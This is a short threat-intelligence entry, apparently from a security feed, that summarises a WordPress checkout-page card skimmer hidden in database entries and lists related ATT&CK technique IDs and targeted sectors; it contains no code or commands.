Stealthy Credit Card Skimmer Targets WordPress Checkout Pages via Database Injection
Jan. 10, 2025, 8:41 a.m.
Tags
External References
Description
A sophisticated credit card skimmer malware has been discovered targeting WordPress websites. The malware injects malicious JavaScript into database entries, specifically in the wp_options table, to steal sensitive payment details from checkout pages. It activates only on checkout pages, either hijacking existing payment fields or injecting a fake credit card form. The malware uses Base64 encoding and AES-CBC encryption to obfuscate stolen data before sending it to attacker-controlled servers. This stealthy approach allows the malware to persist undetected on compromised sites, avoiding common file-scanning tools. The attack demonstrates the evolving techniques used by attackers to target sensitive checkout processes in WordPress environments.
Date
Published: Jan. 10, 2025, 1:21 a.m.
Created: Jan. 10, 2025, 1:21 a.m.
Modified: Jan. 10, 2025, 8:41 a.m.
Attack Patterns
T1056.003
T1592.002
T1132.001
T1185
T1059.007
T1071.001
T1055
T1140
T1027
Additional Informations
Retail
Finance